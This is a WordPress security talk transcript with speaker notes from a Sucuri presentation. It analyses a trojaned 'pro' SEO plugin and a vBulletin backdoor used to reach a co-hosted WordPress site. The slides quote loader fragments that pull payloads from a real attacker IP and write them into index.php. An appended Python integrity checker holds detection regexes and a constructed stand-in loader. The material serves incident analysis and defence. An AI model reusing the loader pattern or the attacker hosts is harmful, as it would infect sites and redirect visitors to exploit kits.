WordPress Security - Learning From Hacks
Speaker notes

  • Defense in depth is a pretty standard phrase used in the security world: there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems, that one plugin that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
  • Be sure to check out Jason Cosper’s presentation from earlier this evening; it should be up on WordSesh soon. He goes through some good tips on hardening your WordPress site.

Transcript

  • 1. WordPress Security: Learning From Website Hacks
  • 2. This is me! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox. Sucuri Inc. - Website Security
    o Incident Handling
    o Log Analysis
  • 3. Let’s Learn from Website Attacks: Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
  • 4. Attack Scenarios
    o The Art of Phishing
    o Stealing Credit Cards
  • 5. Scenario Uno (One): The art of Phishing Naive Users
  • 6. Attack of Opportunity
    o Holiday season / Holiday spirit
    o Did you say Free?
  • 7. Red Flag[s]
    <A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
    Red Alert: http://www.[infecteddomain].com.au
  • 8. Difference
    o Pro Version? Legit Version?
    o Modified file: aioseop_class.php
  • 9. Intent
    o Redirection - porn or exploit kits
    o Target: index.php
    o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt';
    o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){
  • 10. How?
    o Index.php payload:
    o Using curl to pull content from here: $url = 'http://91.239.15.61/java/google.php';
  • 11. Payload
    o Pulls content from:
      – http://91.239.15.61/google.js - Redirection to Porn Sites
      – http://91.239.15.61/g.php - Exploit Kits
  • 12. Lesson to Be Learned
    o Trust but verify sources
    o This is not isolated to just plugins; it can happen to themes as well
    o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
    o The vulnerability was the website administrator…
  • 13. Scenario Dos (Two): Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
  • 14. Got e-Commerce?
    o Business owners <3 E-commerce
    o CMS extensibility = WooCommerce
    o Quick setup of payment collection systems for goods
    o Awesome, right?
  • 15. Big Target
    o Credit Card = Cha-Ching
    o Used/shared/sold underground
    o Impact is catastrophic
    o Blacklisting
    o Ban
    o No more cash flow! No more Trust!
  • 16. Cross-contamination: Simple concept in which your website is attacked and infected by a neighboring site in the same environment
  • 17. vBulletin
    o Popular CMS Application for Forums
    o WordPress + vBulletin Configurations Common
  • 18. Scenario
    o WordPress: Main website | Blog | e-Commerce
    o vBulletin: Forum
    o 1 Server
  • 19. Payload: Found here: /wp-admin/includes/list.php
  • 20. How?
    o It’s about the journey folks…
  • 21. Scenario
    o list.php?
    o shop.txt?
  • 22. That’s Interesting: /forum/ajax.php?edit=
  • 23. vBulletin Plugin
    o Backdoor shell was installed into vBulletin, giving the attacker the tools they needed to attack the WordPress installation.
  • 24. Dump of Users
  • 25. Attack Vector
    o Access Control
  • 26. Lessons to be Learned
    o Attackers are smart – surprise!!!
    o Cross-contamination is a real threat today!
    o Must be diligent across our stack!
    o Isolate applications if possible.
  • 27. What can you do? Let's get proactive!
  • 28. Harsh Reality: None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips…
  • 29. Two Important Vectors
    o Access control
      – Within your control…
    o Software vulnerabilities
      – Not so much…
  • 30. Defense in Depth
    o There is no single cure
    o Layered Defenses
    o Combination of tools and actions
      – Combine: Protection and Detection
  • 31. Access Control
    o Google Authenticator – 2FA: http://wordpress.org/plugins/google-authenticator/
    o Duo Security – 2FA: http://wordpress.org/plugins/duo-wordpress/
    o Login Security Solution – Policy / Enforcement: http://wordpress.org/plugins/login-security-solution/
    o Sucuri CloudProxy / Detection / Remediation - Complete Website Security: http://sucuri.net/signup
  • 32. Software Vulnerabilities
    o Trusted Sources
      – Start with the repo and established communities
      – If you’re not a developer this is mostly going to be beyond your reach
    o Web Application Firewall (WAF) Plugins
      – Highly ineffective; evading and bypassing is easy
      – Cause Denial of Service attacks
    o SaaS based Web Application Firewall (WAF) more effective!
      – Sucuri CloudProxy WAF
  • 33. Auditing
    o Know what is going on with your site
      – Integrity Checks
      – Logging in / Logging out
      – Changes being made
    o More important than half the hardening tips you read online today
    o Options:
      – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
      – Sucuri Premium Plugin http://wordpress.sucuri.net
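As an added example (not from the deck, and not Sucuri's or any listed plugin's code), the integrity check from slide 33 applied to the tampering in scenario one: hash a trusted copy of the install, diff it against the live tree, and triage every changed or new PHP file for the traits of the loader shown on slides 9-10 (remote fetch, URL on a bare IP, write into index.php). Everything here is constructed: the temp directories, the stand-in plugin file, the dropped list.php, and the 203.0.113.5 documentation address.

```python
import hashlib, os, re, tempfile

# Indicators from scenario one in the deck (payload pulled from a bare IP, written into index.php); constructed, not a complete signature set.
SUSPICIOUS = [
    re.compile(r"file_put_contents\s*\(\s*\$\w+\s*,"),       # writes attacker-chosen content to disk
    re.compile(r"\bcurl_(?:init|exec)\s*\("),                 # fetches content from a remote host
    re.compile(r"['\"]https?://\d{1,3}(?:\.\d{1,3}){3}/"),    # URL pointing at a bare IP address
]

def hash_tree(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def php_indicators(path):
    """Count how many SUSPICIOUS patterns occur in one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sum(1 for rx in SUSPICIOUS if rx.search(text))
def audit(baseline_dir, current_dir):
    """Diff a trusted copy against the live install, then triage the changed or new PHP files."""
    base, live = hash_tree(baseline_dir), hash_tree(current_dir)
    modified = sorted(p for p in base if p in live and base[p] != live[p])
    added = sorted(p for p in live if p not in base)
    hits = {p: php_indicators(os.path.join(current_dir, p)) for p in modified + added if p.endswith(".php")}
    return {"modified": modified, "added": added, "removed": sorted(set(base) - set(live)),
            "indicators": {p: n for p, n in hits.items() if n}}

def write(root, rel, text):
    os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
    with open(os.path.join(root, rel), "w", encoding="utf-8") as fh: fh.write(text)
# Constructed stand-in for the loader on slides 9-10; 203.0.113.5 is a documentation address.
INJECTED = ("$code_txt = 'http://203.0.113.5/o1.txt';\n$code = curl_exec(curl_init($code_txt));\n"
            "$index_path = $path . '/index.php';\nif (file_put_contents($index_path, $code)) { }\n")

def build_demo():
    """Construct a clean plugin copy and a tampered live install in temp dirs (sample data)."""
    clean, live = tempfile.mkdtemp(), tempfile.mkdtemp()
    legit = "<?php\nclass All_in_One_SEO_Pack { /* genuine plugin code */ }\n"
    for root in (clean, live):
        write(root, "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php", legit)
        write(root, "wp-admin/includes/plugin.php", "<?php // unchanged core file\n")
    write(live, "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php", legit + INJECTED)
    write(live, "wp-admin/includes/list.php", "<?php // file that does not belong in core\n")
    return clean, live
```

Note that list.php is reported as added even though its content matches no pattern: the tree diff catches what the signatures miss, which is why the baseline copy should come from the official repository rather than from the live server.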
  • 34. If all else fails…
    o Be sure you have backups…
      – VaultPress – WordPress Sites
      – Sucuri Backups – WordPress and Everything else
    o SaaS based Backups more effective!
  • 35. Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh